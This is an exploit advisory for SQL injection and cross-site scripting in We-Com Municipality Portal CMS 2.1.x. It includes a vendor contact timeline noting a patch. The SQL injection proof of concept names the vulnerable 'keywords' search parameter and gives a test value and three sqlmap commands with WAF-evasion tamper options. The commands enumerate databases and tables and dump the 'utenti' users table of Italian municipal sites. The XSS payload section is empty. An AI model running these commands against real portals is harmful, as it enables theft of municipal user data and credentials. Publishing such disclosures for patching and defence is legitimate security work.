We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

We-Com Municipality Portal CMS version 2.1.x suffers from cross site scripting and remote SQL injection vulnerabilities.

MD5 | 209dcb236d7dfafbaa3a0142dcd10de0

# Exploit Title: We-com Municipality portal CMS SQL Injection & XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.1.x
# Tested on: 5.5.0-kali1-amd64


Vendor contact timeline:

2020-05-05: Contacting vendor through [email protected]
2020-05-26: A Patch is published in the versions
2020-06-01: Release of security advisory

PoC 1:
The attacker once locate the sql vulnerability in the "keywords" parameter of the portal search bar then the attacker will be able to perform an automated process to exploit the secruity of Italien Municipality portal CMS

POST Data: keywords='1'--

SQLMAP Payload(s):

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D **_db --tables

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D **_db -T utenti

PoC 2 :

XSS Vulnerability

Payload(s) :
in the search bar:

Admin panel:


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